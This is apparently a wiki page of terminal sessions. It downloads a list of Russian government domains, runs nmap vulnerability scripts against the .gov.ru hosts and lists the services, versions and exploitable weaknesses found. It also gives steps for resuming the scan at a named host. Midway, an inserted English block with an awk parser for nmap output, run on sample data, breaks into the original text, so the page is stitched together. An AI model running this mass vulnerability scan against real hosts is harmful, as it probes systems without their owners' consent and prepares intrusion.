rusia@dictadura:$ curl https://wiki.acosadores.net/lib/exe/fetch.php?media=rusia:urls_ips_ru_recon_ng.tar.gz -o urls_ips_ru_recon_ng.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 35645  100 35645    0     0   132k      0 --:--:-- --:--:-- --:--:--  133k
nmap against the most common and vulnerable ports
rusia@dictadura:$ nmap -Pn -p 20-23,69,139,137,445,53,443,80,8080,8443 -sV --script vuln $(gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*') -oN nmap_vuln_ru_pcomunes.txt
rusia@dictadura:$ gzip nmap_vuln_ru_pcomunes.txt
rusia@dictadura:$ mv nmap_vuln_ru_pcomunes.txt.gz nmap_vuln_ru_pcomunes_parte1.txt.gz
nmap_vuln_ru_pcomunes_parte1.txt.gz
Open and closed services with their versions
rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | grep -Ex '^[0-9]+\/.*open.*' | sed -E 's/ {2,}/ /g' | sort | uniq
21/tcp open ftp?
21/tcp open ftp ProFTPD 1.3.5e
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh Cisco SSH 1.25 (protocol 2.0)
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
443/tcp open ssl/http Apache httpd
443/tcp open ssl/http Apache httpd 2.2.15
443/tcp open ssl/http ASP.NET 4.0.30319 (MVC 5.3)
443/tcp open ssl/http nginx
443/tcp open ssl/http nginx 1.16.1
443/tcp open ssl/http nginx 1.18.0
443/tcp open ssl/http nginx 1.20.1
443/tcp open ssl/http nginx 1.22.0
443/tcp open ssl/http nginx 1.22.1
443/tcp open ssl/http nginx 1.23.1
443/tcp open ssl/http nginx 1.24.0
443/tcp open ssl/http nginx 1.26.0
443/tcp open ssl/http nginx 1.26.2
443/tcp open ssl/http nginx 1.27.3
443/tcp open ssl/http nginx (reverse proxy)
443/tcp open ssl/http-proxy HAProxy http proxy 1.3.1 or later
443/tcp open ssl/https
443/tcp open ssl/https?
443/tcp open ssl/https ddos-guard
443/tcp open ssl/https nginx
443/tcp open ssl/https WEBrick/1.3.1 (Ruby/2.4.5/2018-10-18)
443/tcp open ssl/https webserver
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
443/tcp open tcpwrapped
53/tcp open domain?
53/tcp open domain dnsmasq 2.84rc2
53/tcp open domain (generic dns response: NOTIMP)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.13 (Ubuntu Linux)
53/tcp open domain ISC BIND 9.18.28-1~deb12u2 (Debian Linux)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
8080/tcp open http-proxy
80/tcp open http
80/tcp open http?
80/tcp open http Apache httpd
80/tcp open http Apache httpd 2.2.15
80/tcp open http Apache httpd 2.4.29
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1i PHP/7.3.7)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34)
80/tcp open http Citrix NetScaler httpd
80/tcp open http ddos-guard
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
80/tcp open http Microsoft IIS httpd 8.5
80/tcp open http nalog.ru
80/tcp open http nginx
80/tcp open http nginx 1.14.2
80/tcp open http nginx 1.18.0
80/tcp open http nginx 1.18.0 (Ubuntu)
80/tcp open http nginx 1.20.2
80/tcp open http nginx 1.22.0
80/tcp open http nginx 1.22.1
80/tcp open http nginx 1.23.1
80/tcp open http nginx 1.24.0
80/tcp open http nginx 1.26.2
80/tcp open http nginx (reverse proxy)
80/tcp open http-proxy (bad gateway)
80/tcp open http-proxy HAProxy http proxy 1.3.1 or later
80/tcp open ssl/http nginx 1.26.2
80/tcp open tcpwrapped
8443/tcp open ssl/http nginx
8443/tcp open ssl/https-alt
rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | grep -Ex '^[0-9]+\/.*closed.*' | sed -E 's/ {2,}/ /g' | sort | uniq
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
443/tcp closed https
445/tcp closed microsoft-ds
53/tcp closed domain
69/tcp closed tftp
8080/tcp closed http-proxy
80/tcp closed http
8443/tcp closed https-alt
rusia@dictadura:$
Vulnerabilities found and the state of each one
rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | sed -nE '/VULNERABLE:/{n;p}' | sort | uniq
|   Apache byterange filter DoS
|   Diffie-Hellman Key Exchange Incorrectly Generated Group Parameters
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|   Slowloris DOS attack
|   SSL POODLE information leak
rusia@dictadura:$
rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | sed -nE '/VULNERABLE:/{n;n;p}' | sort | uniq
|     State: LIKELY VULNERABLE
|     State: UNKNOWN (unable to test)
|     State: VULNERABLE
|     State: VULNERABLE (Exploitable)
rusia@dictadura:$
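The two pipelines above (the open-service listing and the VULNERABLE title/State extraction) each print a flat, de-duplicated list, so a finding's State is separated from its title and from the host and port it was reported on. As an added example that is not part of the original page, the sh/awk parser below reads the same nmap -oN format and keeps each line tied to its host, port and State; the sample scan output and the example.invalid hostnames are constructed so it runs offline.

```shell
#!/bin/sh
# Added example (not from the original page): parse nmap -oN output so that every
# open service and every VULNERABLE finding keeps its host, port and State.
# SAMPLE_NMAP_OUTPUT is constructed; hostnames are reserved placeholder names.
SAMPLE_NMAP_OUTPUT='Nmap scan report for web1.example.invalid (192.0.2.10)
Host is up (0.012s latency).

PORT     STATE  SERVICE  VERSION
22/tcp   open   ssh      OpenSSH 7.4 (protocol 2.0)
443/tcp  open   ssl/http nginx 1.18.0
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
8080/tcp closed http-proxy

Nmap scan report for web2.example.invalid (192.0.2.20)
Host is up (0.020s latency).

PORT     STATE  SERVICE  VERSION
80/tcp   open   http     Apache httpd 2.2.15
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
'

# Open services with their host: "host<TAB>port<TAB>service<TAB>version"
nmap_open_services() {
  awk '/^Nmap scan report for / { host = $5 }
       /^[0-9]+\/(tcp|udp)[ \t]+open/ { v = ""; for (i = 4; i <= NF; i++) v = v (i > 4 ? " " : "") $i
                                        print host "\t" $1 "\t" $3 "\t" v }'
}

# One line per VULNERABLE finding: "host<TAB>port<TAB>title<TAB>state".
# The title is the line after "VULNERABLE:", the state comes from the next "State:" line;
# a finding without a State line is still emitted, marked "(no State line)".
nmap_vuln_findings() {
  awk 'function flush() { if (pending) { print host "\t" port "\t" title "\t" state; pending = 0 } }
       /^Nmap scan report for / { flush(); host = $5 }
       /^[0-9]+\/(tcp|udp)/     { flush(); port = $1 }
       /^[|][ \t]*VULNERABLE:/  { flush(); getline; sub(/^[|][ \t]*/, ""); title = $0
                                  state = "(no State line)"; pending = 1; next }
       pending && /State:/      { sub(/.*State: */, ""); state = $0; flush() }
       END { flush() }'
}

printf '%s' "$SAMPLE_NMAP_OUTPUT" | nmap_open_services
printf '%s' "$SAMPLE_NMAP_OUTPUT" | nmap_vuln_findings
```

Feed a real report with `gunzip -c file.txt.gz | nmap_vuln_findings`; piping the result through `sort | uniq -c` then gives counts per host and state instead of the detached lists above.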
The scan stopped at msp.alania.gov.ru. To try to resume and complete it, first find that host's line number with
gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*' | less -N /msp.alania.gov.ru
Once the line number is known, extract the remaining URLs from that line to the end of the file
gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*' | sed -n '427,$p'
Last step
rusia@dictadura:$ nmap -Pn -p 20-23,69,139,137,445,53,443,80,8080,8443 -sV --script vuln $(gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*' | sed -n '427,$p') -oN nmap_vuln_ru_pcomunes_parte2.txt